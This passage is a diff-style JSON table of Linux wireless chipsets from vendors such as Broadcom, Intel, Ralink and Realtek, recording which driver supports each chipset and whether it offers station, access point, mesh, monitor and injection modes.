"Manufacturer": "Broadcom", + "Chipset": "BCM4323x", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "possible future support w/ brcmfmac? (probably not)" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43235, BCM43236, BCM43238 \n(chip revision dependent)", + "Driver": "brcmfmac", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "y", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "patch adding support recently added\nbrcmfmac" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4326U", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM4329", + "Driver": "brcmfmac", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "SDIO", + "Notes": "brcmfmac" + }, + { + "Manufacturer": "Broadcom", + "Chipset": "BCM43224, BCM43225", + "Driver": "brcmsmac", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "BCMA\nbrcmsmac" + }, + { + "Manufacturer": "Conexant", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Conexant", + "Chipset": "CX53111", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Conexant", + "Chipset": "CX53822", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "CF", + "Notes": "" + }, + { + "Manufacturer": "Envara", + "Chipset": "WiND502/512", + "Driver": "none", + "PHY Modes": "(a)/b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "WiND512 (b/g) devices common" + }, + { + "Manufacturer": "Inprocomm", + "Chipset": "IPN2120, IPN2220", + "Driver": "none", + "PHY Modes": "b/(g)", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Inprocomm", + "Chipset": "IPN2128", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "Intel", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 2100B", + "Driver": "ipw2100", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI", + "Notes": "ipw2100" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 2200BG, 2915ABG", + "Driver": "ipw2200", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "oot", + "Mesh": "n", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "ipw2200" + }, + { + "Manufacturer": "Intel", + "Chipset": "PRO/Wireless 3945ABG", + "Driver": "iwl3945", + "PHY Modes": "a/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwl3945" + }, + { + "Manufacturer": "Intel", + "Chipset": "Wireless WiFi Link 4965AGN", + "Driver": "iwl4965", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwl4965" + }, + { + "Manufacturer": "Intel", + "Chipset": "WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300", + "Driver": "iwlagn", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI", + "Notes": "iwlagn\niwlwifi" + }, + { + "Manufacturer": "Intel", + "Chipset": "IWMC3200 (Evans Peak)", + "Driver": "iwmc3200", + "PHY Modes": "a/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "SDIO", + "Notes": "iwmc3200" + }, + { + "Manufacturer": "Intersil", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Intersil", + "Chipset": "PRISM 2/2.5/3 \nPCI/CF/PCMCIA", + "Driver": "hostap", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB /USB", + "Notes": "hostap" + }, + { + "Manufacturer": "Intersil", + "Chipset": "PRISM 2.5/3 USB", + "Driver": "prism2_usb", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "b", + "Bus": "PCI/CB /USB", + "Notes": "staging driver from linux-wlan-ng\nprism2 usb" + }, + { + "Manufacturer": "Intersil", + "Chipset": "ISL3877, ISL3880,\nISL3890, ISL3886", + "Driver": "p54pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "p54pci" + }, + { + "Manufacturer": "Intersil", + "Chipset": "ISL3880/ISL3886\n+ NET2280, ISL3887", + "Driver": "p54usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "p54usb" + }, + { + "Manufacturer": "Lucent", + "Chipset": "HERMES I (WaveLAN\n/IEEE/ORiNOCO)", + "Driver": "orinoco", + "PHY Modes": "b", + "Encrypt.": "WEP, WPA-TKIP", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "oot", + "Bus": "PCI/ PCMCIA/ USB 1.0", + "Notes": "no Bronze support\norinoco\norinoco usb" + }, + { + "Manufacturer": "Marvell", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8310", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8335", + "Driver": "mrv8k", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "mrv8k" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8338", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8385,\n88W8388, 88W8686", + "Driver": "libertas", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB/CF /SDIO", + "Notes": "libertas" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8388", + "Driver": "libertas_tf", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "n", + "AP": "y", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB/CF /SDIO", + "Notes": "OLPC XO-1,\nsupports mesh" + }, + { + "Manufacturer": "Marvell\n(TopDog)", + "Chipset": "88W8360, 88W8361,\n88W8362 (USB),\n88W8362E, 88W8363", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/PCIe/ CB/USB2.0", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(TopDog/\nAvastar*)", + "Chipset": "88W8366, 88W8863,\n88W8687, 88W8764*", + "Driver": "mwl8k", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "mwl8k" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8797 (88W8786U)", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB", + "Notes": "1286:2049\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8786, 88W8787,\n88W8797, 88W8897*", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "02df:9139\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8766, 88W8897*", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "11ab:2b38\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar) AC*", + "Chipset": "88W8864*, 88W8897*", + "Driver": "mwlwifi", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "iwlwifi\nWRT1900\niwlwifi" + }, + { + "Manufacturer": "Marvell", + "Chipset": "unknown", + "Driver": "mrvl_cb82", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT5911N", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT7601U", + "Driver": "mt7601u", + "PHY Modes": "a/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT7610U", + "Driver": "mt7601u", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Metalink", + "Chipset": "MtW817x", + "Driver": "none", + "PHY Modes": "a/(b)/(g)/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "No Wires Needed", + "Chipset": "Swallow", + "Driver": "swallow_cs", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete out of kernel driver" + }, + { + "Manufacturer": "No Wires Needed", + "Chipset": "Poldhu", + "Driver": "poldhu", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete out of kernel driver\npoldhu cs" + }, + { + "Manufacturer": "Ralink", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2460", + "Driver": "rt2400pci", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2560", + "Driver": "rt2500pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2561, RT2561S, RT2661", + "Driver": "rt61pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2571, RT2572", + "Driver": "rt2500usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2571W, RT2573, RT2671", + "Driver": "rt73usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290", + "Driver": "rt2800pci", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "Wiki" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x", + "Driver": "rt2860sta", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "n", + "Bus": "PCI/PCIe /CB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070", + "Driver": "rt2800usb", + "PHY Modes": "(a)b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y (??)", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "Wiki" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2770, RT2870, RT2070, RT307x", + "Driver": "rt2870sta", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT3572", + "Driver": "rt3572sta", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT3573", + "Driver": "none", + "PHY Modes": "a/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "three stream" + }, + { + "Manufacturer": "Realtek", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8180L, RTL8185L,\nRTL8187SE (3.15+)", + "Driver": "rtl8180", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8187L, RTL8187B", + "Driver": "rtl8187", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8187SE", + "Driver": "rtl8187se", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8190", + "Driver": "r8190_pci", + "PHY Modes": "b/g/n", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI\n/ CB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192E", + "Driver": "r8192e_pci", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8191SE, RTL8192SE", + "Driver": "rtl8192se", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192U", + "Driver": "r8192u_usb", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", + "Driver": "r8712u", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", + "Driver": "r8192s_usb", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver, superseded by r8712u" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188CE, RTL8192CE", + "Driver": "rtl8192ce", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188CUS, RTL8192CU, RTL8188RU", + "Driver": "rtl8192cu", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "?", + "Monitor": "y", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192DU", + "Driver": "rtl8192du", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "driver available here, may panic on init on some kernels" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192DE", + "Driver": "rtl8192de", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Renesas", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Renesas", + "Chipset": "KS7010", + "Driver": "ks7010", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "from Javi Roman" + }, + { + "Manufacturer": "ShareWave / Cirrus Logic", + "Chipset": "Bodega", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCMCIA/ USB 1.0", + "Notes": "rare devices, support the proprietary Whitecap protocol" + }, + { + "Manufacturer": "SiS", + "Chipset": "160", + "Driver": "sis160", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI", + "Notes": "rare devices, driver is a useless binary blob" + }, + { + "Manufacturer": "SiS", + "Chipset": "162, 162U", + "Driver": "sis162", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ USB 2.0", + "Notes": "driver is a useless binary blob" + }, + { + "Manufacturer": "SiS", + "Chipset": "163, 163U", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CF/ USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "ST-Ericsson", + "Chipset": "CW1100, CW1200", + "Driver": "cw1200", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO\n/ PCI", + "Notes": "(since 3.11)" + }, + { + "Manufacturer": "ST-NXP", + "Chipset": "STLC4560", + "Driver": "p54spi", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "SPI", + "Notes": "" + }, + { + "Manufacturer": "Symbol", + "Chipset": "Spectrum24 DS", + "Driver": "orinoco", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "orinoco" + }, + { + "Manufacturer": "Syntek/3DSP", + "Chipset": "unknown\n(Bluew-2310x)", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "compiled modules available" + }, + { + "Manufacturer": "Syntek/3DSP", + "Chipset": "STK9100+STK9230\n(Bluew-2310u)", + "Driver": "3dspusbwlan", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "partial source?" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450", + "Driver": "acx1xx", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/CB /USB", + "Notes": "acx100\nacx" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "WL1251", + "Driver": "wl1251", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "SPI/ SDIO", + "Notes": "" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "WL1271", + "Driver": "wl1271", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "SPI/ SDIO", + "Notes": "" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6551", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6555", + "Driver": "vt6655", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCI", + "Notes": "staging (vendor) driver\nvt6656" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6556", + "Driver": "vt6656", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCI", + 